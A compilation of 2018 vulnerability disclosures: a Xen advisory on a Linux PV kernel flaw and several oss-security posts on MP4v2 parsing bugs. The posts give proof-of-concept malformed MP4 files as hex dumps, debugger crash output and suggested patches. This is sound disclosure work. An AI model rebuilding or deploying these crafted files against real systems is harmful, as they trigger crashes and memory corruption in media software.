An issue was discovered in the Linux kernel through 4.17.11, as used in Xen through 4.11.x. The xen_failsafe_callback entry point in arch/x86/entry/entry_64.S does not properly maintain RBX, which allows local users to cause a denial of service (uninitialized memory usage and system crash). Within Xen, 64-bit x86 PV Linux guest OS users can trigger a guest OS crash or possibly gain privileges.

**Information**

Advisory

XSA-274

Public release

2018-07-25 16:39

Updated

2018-08-15 16:09

Version

3

CVE(s)

CVE-2018-14678

Title

Linux: Uninitialized state in x86 PV failsafe callback path

**Files**advisory-274.txt (signed advisory file)  
xsa274-linux-4.17.patch**Advisory**

\-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

            Xen Security Advisory CVE-2018-14678 / XSA-274
                               version 3

      Linux: Uninitialized state in x86 PV failsafe callback path

UPDATES IN VERSION 3
====================

Fix spelling in CREDITS.

ISSUE DESCRIPTION
=================

Linux has a \`failsafe\` callback, invoked by Xen under certain
conditions.  Normally in this failsafe callback, error\_entry is paired
with error\_exit; and error\_entry uses %ebx to communicate to
error\_exit whether to use the user or kernel return path.

Unfortunately, on 64-bit PV Xen on x86, error\_exit is called without
error\_entry being called first, leaving %ebx with an invalid value.

IMPACT
======

A rogue user-space program could crash a guest kernel.  Privilege
escalation cannot be ruled out.

VULNERABLE SYSTEMS
==================

Only 64-bit x86 PV Linux systems are vulnerable.

All versions of Linux are vulnerable.

MITIGATION
==========

Switching to HVM or PVH guests will mitigate this issue.

CREDITS
=======

This issue was discovered by M. Vefa Bicakci, and recognized as a
security issue by Andy Lutomirski.

RESOLUTION
==========

Applying the appropriate attached patch resolves this issue.

NB this patch has not been accepted into Linux upstream yet.  An
updated advisory will be sent if the fix upstreamed looks
significantly different.

xsa274-linux-4.17.patch           Linux 4.17

$ sha256sum xsa274\*
0c30cb13d1d573f446c8cb8d4824ffad8ef9149a7589a19ef9bcc83c07bddcf5  xsa274-linux-4.17.patch
$

NOTE ON THE LACK OF EMBARGO
===========================

The patch for this issue was published on linux-kernel without being
first reported to the XenProject Security Team.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBCAAGBQJbdFA5AAoJEIP+FMlX6CvZWQQIAIxMK2w6CsH2aNQRDiDrgcBc
2FkBbroS5I1XHEhWVyO19aPhp1R3mYNU+pTUUFOevQuKvTP0nuZ0csgk5LUj9UP7
EE/3vM3jkAfmIIuXCAegOcznnEl6Wi9aMKGVXcxMkRu9qjKStGr4We5qvmdPncUj
DkTdD6VbmM/Q665b0jU4j2aZPDMsH63qrsbz1rsnPAlYUi1R+yKw56Q5UdRJK17j
Jc74v+elyqOkFq7QwH1usfnko+DQziLyLqEBQOztTSps2qYM+VwHLAZkhxNyuLsu
2x9/1D8XoZ+BHvVsVe50QmoNcJViMMunnHNhWYHmtXLYFErwUOt48N1vl+3xFpo=
=k4Ak
-----END PGP SIGNATURE-----

Xenproject.org Security Team

CVE-2018-14678: 274 - Xen Security Advisories

MP4NameFirstMatches in mp4util.cpp in MP4v2 2.0.0 mishandles substrings of atom names, leading to use of an inappropriate data type for associated atoms. The resulting type confusion can cause out-of-bounds memory access.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 18 Jul 2018 16:30:41 +0800
From: Ruikai Liu <lrk700@...il.com>
To: oss-security@...ts.openwall.com
Subject: Out-of-bounds memory access in MP4v2 2.0.0

Hi,

A out-of-bounds memory access bug is found in MP4v2 2.0.0, a legacy
library dealing with MP4 media file.

========= find atom by type =========

The function \`FindAtom\` iterates the atom tree and find the target by
comparing its type with the given one:

 316 MP4Atom\* MP4Atom::FindChildAtom(const char\* name)
 317 {
 318     uint32\_t atomIndex = 0;
 319
 320     // get the index if we have one, e.g. moov.trak\[2\].mdia...
 321     (void)MP4NameFirstIndex(name, &atomIndex);
 322
 323     // need to get to the index'th child atom of the right type
 324     for (uint32\_t i = 0; i < m\_pChildAtoms.Size(); i++) {
 325         if (MP4NameFirstMatches(m\_pChildAtoms\[i\]->GetType(), name)) {
 ...

However, the comparison could be passed for an crafted atom which
doesn't match in fact:

 29 bool MP4NameFirstMatches(const char\* s1, const char\* s2)
 30 {
 31     if (s1 == NULL || \*s1 == '\\0' || s2 == NULL || \*s2 == '\\0') {
 32         return false;
 33     }
 34
 35     if (\*s2 == '\*') {
 36         return true;
 37     }
 38
 39     while (\*s1 != '\\0') {
 40         if (\*s2 == '\\0' || strchr("\[.", \*s2)) {
 41             break;
 42         }
 43         if (tolower(\*s1) != tolower(\*s2)) {
 44             return false;
 45         }
 46         s1++;
 47         s2++;
 48     }
 49     return true;
 50 }

The above while-loop would exit and return true once \`s1\` ends early.
For example, \`MP4NameFirstMatches("abc\\x00", "abcd")\` returns true,
though an atom with type "abc\\x00" should never be returned when
finding atom of type "abcd".

Things are different when creating atoms. The 4-bytes type read from
file is strictly checked to determine which atom constructor to
use(src/mp4atom.cpp):

 954             if( ATOMID(type) == ATOMID("sdtp") )
 955                 return new MP4SdtpAtom(file);

The above difference between creating and finding atoms could result
in type confusion, which leads to out-of-bounds memory access.

========= MP4SdtpAtom =========

\`FindAtom\` is called to find an atom of type "sdtp" when generating
the track info(src/mp4track.cpp):

 239     // update sdtp log from sdtp atom
 240     MP4SdtpAtom\* sdtp = (MP4SdtpAtom\*)m\_trakAtom.FindAtom(
"trak.mdia.minf.stbl.sdtp" );
 241     if( sdtp ) {
 242         uint8\_t\* buffer;
 243         uint32\_t bufsize;
 244         sdtp->data.GetValue( &buffer, &bufsize );
 245         m\_sdtpLog.assign( (char\*)buffer, bufsize );
 246         free( buffer );
 247     }

So if a crafted MP4 file contains an atom of type "sdt\\x00", then this
atom would be returned and cast to \`MP4SdtpAtom\`. But its actual class
is not \`MP4SdtpAtom\` since strict comparison is used when creating the
atom. As a result, \`sdtp->data\` is actually out of the object.

========= POC =========

We build a MP4 file which contains the necessary fields. The atoms are
arranged dedicatedly so that for 32-bits program, \`sdtp->data\` would
access the trackID, which is controlled by us and would finally leads
to reading from \`0xdeadbeef\`:

root@...ian:~# xxd c4.mp4
00000000: 0000 0018 6674 7970 6d70 3432 0000 0000  ....ftypmp42....
00000010: 6d70 3432 6973 6f6d 0000 01c4 6d6f 6f76  mp42isom....moov
00000020: 0000 006c 6d76 6864 0000 0000 3030 3030  ...lmvhd....0000
00000030: 3030 3030 3030 3030 3030 3030 3030 3030  0000000000000000
00000040: 3030 3030 0000 0000 0000 0000 0000 0000  0000............
00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000060: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000070: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000080: 0000 0000 0000 0000 0000 0000 0000 0150  ...............P
00000090: 7472 616b 0000 0060 746b 6864 0000 0001  trak...\`tkhd....
000000a0: 1234 5678 2345 6789 dead bed7 0000 0000  .4Vx#Eg.........
000000b0: 9876 5432 0000 0000 4141 4141 4141 4141  .vT2....AAAAAAAA
000000c0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
000000d0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
000000e0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
000000f0: 4141 4141 0000 00e8 6d64 6961 0000 0008  AAAA....mdia....
00000100: 0565 7374 0000 0020 6864 6c72 4242 4242  .est... hdlrBBBB
00000110: 4242 4242 4242 4242 4242 4242 4242 4242  BBBBBBBBBBBBBBBB
00000120: 4242 4242 0000 0020 6d64 6864 0000 0000  BBBB... mdhd....
00000130: 3030 3030 4040 4040 5050 5050 1010 1010  0000@@@@PPPP....
00000140: 9090 9090 0000 0098 6d69 6e66 0000 0008  ........minf....
00000150: 0465 7374 0000 0088 7374 626c 0000 0018  .est....stbl....
00000160: 7374 737a 0000 0000 0000 0000 0000 0000  stsz............
00000170: 0000 0000 0000 001c 7374 7363 0000 0000  ........stsc....
00000180: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000190: 0000 0010 7374 636f 0000 0000 0000 0000  ....stco........
000001a0: 0000 0018 7374 7473 0000 0000 0000 0000  ....stts........
000001b0: 0000 0000 0000 0000 0000 001c 1364 7400  .............dt.
000001c0: 0000 001c 036f 3634 0000 0000 0000 0008  .....o64........
000001d0: 7374 7368 0000 0008 7364 7400            stsh....sdt.

Here's the result of running \`mp4info\` on it:

root@...ian:~# gdb /usr/bin/mp4info
Reading symbols from /usr/bin/mp4info...(no debugging symbols found)...done.
(gdb) r c4.mp4
Starting program: /usr/bin/mp4info c4.mp4
/usr/bin/mp4info version -r
c4.mp4:
ReadAtom: "c4.mp4": atom type est is suspect
ReadAtom: "c4.mp4": atom type est is suspect
ReadAtom: "c4.mp4": atom type dt is suspect
ReadAtom: "c4.mp4": atom type sdt is suspect
ReadChildAtoms: "c4.mp4": In atom stbl missing child atom stsd
ReadChildAtoms: "c4.mp4": In atom minf missing child atom dinf

Program received signal SIGSEGV, Segmentation fault.
0xf7ece2c6 in ?? () from /usr/lib/i386-linux-gnu/libmp4v2.so.2
(gdb) x/i $eip
=> 0xf7ece2c6:  mov    (%eax),%ecx
(gdb) i r eax
eax            0xdeadbeef       -559038737

The binary we test is the i386 mp4v2 package of Debian:

root@...ian:~# dpkg -s mp4v2-utils
Package: mp4v2-utils
Status: install ok installed
Priority: optional
Section: sound
Installed-Size: 281
Maintainer: Debian Multimedia Maintainers
<pkg-multimedia-maintainers@...ts.alioth.debian.org>
Architecture: i386
Source: mp4v2 (2.0.0~dfsg0-5)
Version: 2.0.0~dfsg0-5+b1
Depends: libmp4v2-2 (= 2.0.0~dfsg0-5+b1), libc6 (>= 2.4), libgcc1 (>=
1:4.2), libstdc++6 (>= 5.2)

========= fix =========

The bug can be fixed by more checks when doing type comparison. For example:

--- src/mp4util.cpp     2018-07-18 15:48:12.766709572 +0800
+++ ../mp4v2-2.0.0-orig/src/mp4util.cpp     2012-05-21 06:11:53.000000000 +0800
@@ -46,7 +46,6 @@
         s1++;
         s2++;
     }
-    if(\*s2 != '\[' && \*s2 != '.' && \*s2 != '\\0') return false;
     return true;
 }

========= Reference =========

\[1\] https://code.google.com/archive/p/mp4v2/
\[2\] http://xhelmboyx.tripod.com/formats/mp4-layout.txt

-- 
Best regards,

Ruikai Liu

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2018-14403: security - Out-of-bounds memory access in MP4v2 2.0.0

MP4Atom::factory in mp4atom.cpp in MP4v2 2.0.0 incorrectly uses the MP4ItemAtom data type in a certain case where MP4DataAtom is required, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted MP4 file, because access to the data structure has different expectations about layout as a result of this type confusion.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Tue, 17 Jul 2018 14:30:48 +0800
From: Ruikai Liu <lrk700@...il.com>
To: oss-security@...ts.openwall.com
Subject: Type confusion in MP4v2 2.0.0

Hi,

A type confusion bug is found in MP4v2 2.0.0, a legacy library dealing
with MP4 media file.

========= ilst box =========

According to ref\[2\], MP4 file could contain an \`ilst\` box, which
stands for item list. Tags such as album, author, etc., are stored
here. A typical \`ilst\` box looks like this:

\[ilst box\] --> \[nam box(full name)\] -> \[data box\]
         |---> \[cmt box(comment)\] -> \[data box\]
         |---> \[day box(created time)\] -> \[data box\]
         ...

MP4v2 would use \`MP4ItemAtom\` for nam/cmt/... box, and \`MP4DataAtom\`
for data box:

 772 MP4Atom\*
 773 MP4Atom::factory( MP4File &file, MP4Atom\* parent, const char\* type )
 774 {
 775     // type may be NULL only in case of root-atom
 776     if( !type )
 777         return new MP4RootAtom(file);
 778
 779     // construct atoms which are context-savvy
 780     if( parent ) {
 781         const char\* const ptype = parent->GetType();
 782
 783         if( descendsFrom( parent, "ilst" )) {
 784             if( ATOMID( ptype ) == ATOMID( "ilst" ))
 785                 return new MP4ItemAtom( file, type );
 786
 787             if( ATOMID( type ) == ATOMID( "data" ))
 788                 return new MP4DataAtom(file);

However, if a crafted MP4 file has the following structure:

\[ilst box\] -> \[ilst box\] -> \[data box\]

Then \`MP4ItemAtom\` would be created for the data box instead of
\`MP4DataAtom\`, since its parent is still of type \`ilst\`.

========= type confusion =========

Now, to parse the tag info of the MP4 file, \`Tags::c\_fetch\` is called,
which invokes \`genericGetItems\`:

293 MP4ItmfItemList\*
294 genericGetItems( MP4File& file )
295 {
296     MP4Atom\* ilst = file.FindAtom( "moov.udta.meta.ilst" );
297     if( !ilst )
298         return \_\_itemListAlloc();
299
300     const uint32\_t itemCount = ilst->GetNumberOfChildAtoms();
301     if( itemCount < 1 )
302         return \_\_itemListAlloc();
303
304     MP4ItmfItemList& list = \*\_\_itemListAlloc();
305     \_\_itemListResize( list, itemCount );
306
307     for( uint32\_t i = 0; i < list.size; i++ )
308         \_\_itemAtomToModel( \*(MP4ItemAtom\*)ilst->GetChildAtom( i ),
list.elements\[i\] );
309
310     return &list;
311 }

Here we first find the atom for \`ilst\`, and then iterate its child
atoms. Remember that there's a duplicate \`ilst\` in the crafted MP4
file, in which case the root \`ilst\` atom's child is a \`MP4ItemAtom\` of
type \`ilst\`, and its grandchild is a \`MP4ItemAtom\` of type \`data\`.

Then in the function \`\_\_itemAtomToModel\`, the \`MP4ItemAtom\` of type
\`ilst\` is parsed:

153 static bool
154 \_\_itemAtomToModel( MP4ItemAtom& item\_atom, MP4ItmfItem& model )
...
193     // pass 2: populate data model
194     for( uint32\_t i = 0, idata = 0; i < childCount; i++ ) {
195         MP4Atom\* atom = item\_atom.GetChildAtom( i );
196         if( ATOMID( atom->GetType() ) != ATOMID( "data" ))
197             continue;
198
199         MP4DataAtom& data\_atom = \*(MP4DataAtom\*)atom;

We can see that line 199 would cast its child to \`MP4DataAtom\`
directly, which in fact is a \`MP4ItemAtom\`. Since these two objects
are of different layout, operations on the \`data\_atom\` could lead to
memory corruption due to the type confusion.

========= POC =========

Here we create a MP4 file with two \`ilst\`s:

root@...ian:~# xxd c3.mp4
00000000: 0000 0018 6674 7970 6d70 3432 0000 0000  ....ftypmp42....
00000010: 6d70 3432 6973 6f6d 0000 00b8 6d6f 6f76  mp42isom....moov
00000020: 0000 006c 6d76 6864 0000 0000 1234 5678  ...lmvhd.....4Vx
00000030: 2345 6789 0000 0258 9876 5432 0987 6543  #Eg....X.vT2..eC
00000040: 5600 0000 0000 0000 0000 0000 0000 0000  V...............
00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000060: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000070: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000080: 0000 0000 0000 0000 dead beef 0000 0044  ...............D
00000090: 7564 7461 0000 003c 6d65 7461 0000 0000  udta...<meta....
000000a0: 0000 0030 696c 7374 0000 0028 696c 7374  ...0ilst...(ilst
000000b0: 0000 0008 6461 7461 0000 0008 6461 7461  ....data....data
000000c0: 0000 0008 6461 7461 0000 0008 6461 7461  ....data....data

It results in segfault when running \`mp4info\`:

root@...ian:~# mp4info c3.mp4
mp4info version -r
c3.mp4:
ReadChildAtoms: "c3.mp4": In atom data missing child atom data
ReadChildAtoms: "c3.mp4": In atom data missing child atom data
ReadChildAtoms: "c3.mp4": In atom data missing child atom data
ReadChildAtoms: "c3.mp4": In atom data missing child atom data
ReadChildAtoms: "c3.mp4": In atom meta missing child atom hdlr
ReadChildAtoms: "c3.mp4": In atom moov missing child atom trak
Track   Type    Info
ReadChildAtoms: "c3.mp4": In atom data missing child atom data
ReadChildAtoms: "c3.mp4": In atom data missing child atom data
ReadChildAtoms: "c3.mp4": In atom data missing child atom data
ReadChildAtoms: "c3.mp4": In atom data missing child atom data
ReadChildAtoms: "c3.mp4": In atom meta missing child atom hdlr
ReadChildAtoms: "c3.mp4": In atom moov missing child atom trak
Segmentation fault

root@...ian:~#
root@...ian:~# dpkg -s mp4v2-utils
Package: mp4v2-utils
Status: install ok installed
Priority: optional
Section: sound
Installed-Size: 300
Maintainer: Debian Multimedia Maintainers
<pkg-multimedia-maintainers@...ts.alioth.debian.org>
Architecture: amd64
Source: mp4v2 (2.0.0~dfsg0-5)
Version: 2.0.0~dfsg0-5+b1
Depends: libmp4v2-2 (= 2.0.0~dfsg0-5+b1), libc6 (>= 2.14), libgcc1 (>=
1:3.0), libstdc++6 (>= 5.2)

========= fix =========

The bug is caused by the wrong assumption that the child of an \`ilst\`
can never be an \`ilst\`. So we could fix it by simply adding an ASSERT:

--- src/mp4atom.cpp     2018-07-17 11:37:01.266702613 +0800
+++ ../mp4v2-2.0.0-orig/src/mp4atom.cpp 2018-07-17 14:20:54.986316212 +0800
@@ -783,6 +783,7 @@

         if( descendsFrom( parent, "ilst" )) {
             if( ATOMID( ptype ) == ATOMID( "ilst" ))
-                ASSERT(ATOMID( type ) != ATOMID( "ilst" ));
                 return new MP4ItemAtom( file, type );

             if( ATOMID( type ) == ATOMID( "data" )) {



========= Reference =========

\[1\] https://code.google.com/archive/p/mp4v2/
\[2\] http://xhelmboyx.tripod.com/formats/mp4-layout.txt

-- 
Best regards,

Ruikai Liu

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2018-14379: security - Type confusion in MP4v2 2.0.0

In MP4v2 2.0.0, there is an integer overflow (with resultant memory corruption) when resizing MP4Array for the ftyp atom in mp4array.h.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Mon, 16 Jul 2018 15:10:41 +0800
From: Ruikai Liu <lrk700@...il.com>
To: oss-security@...ts.openwall.com
Subject: Integer underflow/overflow in MP4v2 2.0.0

Hi,

Integer underflow and overflow are found in MP4v2 2.0.0, a legacy library
dealing with MP4 media file.

========= Underflow =========

Atom is the basic element of MP4. However there's an integer underflow when
parsing an atom(src/mp4atom.cpp):

 121     uint64\_t dataSize = file.ReadUInt32();
 ...
 146     dataSize -= hdrSize;
 ...
 151     if (pos + hdrSize + dataSize > pParentAtom->GetEnd()) {
 ...
 164         // skip to end of atom
 165         dataSize = pParentAtom->GetEnd() - pos - hdrSize;
 166     }

If \`dataSize\` read from file is less than \`hdrSize\`, then underflow happens
and it becomes a very large unsigned integer at line 146. Yet the check at
line 151 would still be passed, which results in an corrupted atom with
extremely large size.

========= Overflow =========

\`ftyp\` is an atom that describes the version info of the MP4 file. It will
allocate memory for compatible brands according to the atom's size:

 54 void MP4FtypAtom::Read()
 55 {
 56     compatibleBrands.SetCount( (m\_size - 8) / 4 ); // brands array
fills rest of atom
 57     MP4Atom::Read();
 58 }

 342 void MP4StringProperty::SetCount(uint32\_t count)
 343 {
 344     uint32\_t oldCount = m\_values.Size();
 345
 346     m\_values.Resize(count);
 347
 348     for (uint32\_t i = oldCount; i < count; i++) {
 349         m\_values\[i\] = NULL;
 350     }
 351 }

\`Resize\` here is a wrapper of \`realloc\`:

102         void Resize(MP4ArrayIndex newSize) { \\
103             m\_numElements = newSize; \\
104             m\_maxNumElements = newSize; \\
105             m\_elements = (type\*)MP4Realloc(m\_elements, \\
106                 m\_maxNumElements \* sizeof(type)); \\
107         } \\

We notice that an integer overflow could happen when calculating
\`m\_maxNumElements \* sizeof(type)\`. So the allocation may return a buffer
smaller than needed, and later operations on the buffer could result in
invalid memory reference, like setting values to be NULL in
\`MP4StringProperty::SetCount\`. This is the case for 64-bits program which
allows memory allocation for large(~4GB) size.

Things are a little different for 32-bits. In this case \`realloc\` would
fail and throws an exception:

 74 inline void\* MP4Realloc(void\* p, uint32\_t newSize) {
 75     // workaround library bug
 76     if (p == NULL && newSize == 0) {
 77         return NULL;
 78     }
 79
 80     void\* temp = realloc(p, newSize);
 81     if (temp == NULL && newSize > 0) {
 82         throw new PlatformException("malloc
failed",errno,\_\_FILE\_\_,\_\_LINE\_\_,\_\_FUNCTION\_\_);
 83     }
 84     return temp;
 85 }

And the destructor the \`MP4StringProperty\` would be invoked:

 334 MP4StringProperty::~MP4StringProperty()
 335 {
 336     uint32\_t count = GetCount();
 337     for (uint32\_t i = 0; i < count; i++) {
 338         MP4Free(m\_values\[i\]);
 339     }
 340 }

But the count here is still the extremly large number we set before, and
the for-loop would certainly have some invalid addresses been freed.

========= POC =========

Here's a very simple POC file:

root@...ian:~# hexdump -Cv c2.mp4
00000000  00 00 00 07 66 74 79 70  6d 70 34 32 41 41 41 41
|....ftypmp42AAAA|
00000010  41 41 41 41 41 41 41 41                           |AAAAAAAA|
00000018

The size of the \`ftyp\` box is 7(the first 4 bytes), which is smalller than
the header size(8 bytes). Therefore the \`dataSize\` for this atom would
become -1=0xffffffffffffffff.

This POC file crashes both 32-bits and 64-bits mp4info.

========= Fix =========

For the underflow, we could check if \`dataSize >= hdrSize\` satisfies:

--- src/mp4atom.cpp     2018-07-16 14:54:33.513635593 +0800
+++ ../mp4v2-2.0.0-orig/src/mp4atom.cpp     2012-05-21 06:11:53.000000000
+0800
@@ -143,9 +143,6 @@
         dataSize = file.GetSize() - pos;
     }

-    if(dataSize < hdrSize) {
-        throw new Exception( "invalid dataSize", \_\_FILE\_\_, \_\_LINE\_\_,
\_\_FUNCTION\_\_ );
-    }
     dataSize -= hdrSize;

     log.verbose1f("\\"%s\\": type = \\"%s\\" data-size = %" PRIu64 " (0x%"
PRIx64 ") hdr %u",


For the overflow, we could check the result of the integer multiplication:

--- src/mp4array.h      2018-07-16 15:00:51.333620723 +0800
+++ ../mp4v2-2.0.0-orig-/src/mp4array.h      2012-05-21 06:11:53.000000000
+0800
@@ -102,11 +102,8 @@
         void Resize(MP4ArrayIndex newSize) { \\
             m\_numElements = newSize; \\
             m\_maxNumElements = newSize; \\
-            uint32\_t mul = newSize \* sizeof(type); \\
-            if(mul / newSize != sizeof(type)) \\
-                throw new Exception("multiplication overflow", \_\_FILE\_\_,
\_\_LINE\_\_, \_\_FUNCTION\_\_);\\
             m\_elements = (type\*)MP4Realloc(m\_elements, \\
-                mul); \\
+                m\_maxNumElements \* sizeof(type)); \\
         } \\


========= Reference =========

https://code.google.com/archive/p/mp4v2/

-- 
Best regards,

Ruikai Liu

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2018-14326: security - Integer underflow/overflow in MP4v2 2.0.0

A double free exists in the MP4StringProperty class in mp4property.cpp in MP4v2 2.0.0. A dangling pointer is freed again in the destructor once an exception is triggered.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Fri, 13 Jul 2018 14:09:48 +0800
From: Ruikai Liu <lrk700@...il.com>
To: oss-security@...ts.openwall.com
Subject: Fastbin double free in MP4v2 2.0.0

Hi,

There's a double free issue in MP4v2 2.0.0, a legacy library dealing with
MP4 media file.

========= Details =========

The buffer is first allocated during the construction of a
\`MP4Mp4vAtom::MP4Mp4vAtom\` in src/atom\_mp4v.cpp:

 46     MP4StringProperty\* pProp =
 47         new MP4StringProperty(\*this, "compressorName");
 48     pProp->SetFixedLength(32);
 49     pProp->SetCountedFormat(true);
 50     pProp->SetValue("");
 51     AddProperty(pProp); /\* 6 \*/

In which \`SetValue\` would allocate a buffer of 32 bytes for the default
value(src/mp4property.cpp):

 534         if (m\_values\[index\] == NULL) {
 535             m\_values\[index\] = (uint8\_t\*)MP4Calloc(m\_fixedValueSize);
 536             m\_valueSizes\[index\] = m\_fixedValueSize;
 537         }

Later, when parsing the atom, a try-catch block is used(src/mp4atom.cpp):

 194     try {
 195         pAtom->Read();
 196     }
 197     catch (Exception\* x) {
 198         // delete atom and rethrow so we don't leak memory.
 199         delete pAtom;
 200         throw x;
 201     }

And calling the atom's \`Read()\` would then invoke reading its
\`MP4StringProperty\` too, in which case the buffer allocated above would be
freed and re-allocaed for the actual value(src/mp4property.cpp):

 390     for( uint32\_t i = begin; i < max; i++ ) {
 391         char\*& value = m\_values\[i\];
 392
 393         // Generally a default atom setting, e.g. see atom\_avc1.cpp,
"JVT/AVC Coding"; we'll leak this string if
 394         // we don't free.  Note that MP4Free checks for null.
 395         MP4Free(value);
 396
 397         if( m\_useCountedFormat ) {
 398             value = file.ReadCountedString( (m\_useUnicode ? 2 : 1),
m\_useExpandedCount, m\_fixedLength );
 399         }

However, a crafted file could result in an exception in
\`ReadCountedString\`(src/mp4file\_io.cpp):

 93     if( file->read( buf, bufsiz, nin ))
 94         throw new PlatformException( "read failed",
sys::getLastError(), \_\_FILE\_\_, \_\_LINE\_\_, \_\_FUNCTION\_\_ );
 95     if( nin != bufsiz )
 96         throw new Exception( "not enough bytes, reached end-of-file",
\_\_FILE\_\_, \_\_LINE\_\_, \_\_FUNCTION\_\_ );

So the exception handler would invoke the deconstructor of \`pAtom\`, which
would delete its properties and free the dangling pointer for the second
time.

========= POC =========

Here's a POC file:

root@...ian:~# hexdump -Cv c1.mp4
00000000  00 00 00 18 66 74 79 70  6d 70 34 32 01 2a 00 7e
|....ftypmp42.\*.~|
00000010  6d 70 34 32 69 73 6f 6d  00 00 00 4a 6d 70 34 76
|mp42isom...Jmp4v|
00000020  6d 70 ff ff 00 01 33 a9  00 7f ff 63 00 05 00 65
|mp....3....c...e|
00000030  00 00 00 07 63 61 74 67  00 1b ff f0 64 78 74 40
|....catg....dxt@|
00000040  00 de ff 00 00 ff ff ff  ff 00 1a 00 0b 00 19 72
|...............r|
00000050  8b 00 00 00 10 23 11 64  61 74 60 00 00 00 ff 7f
|.....#.dat\`.....|
00000060  ff ff                                             |..|
00000062

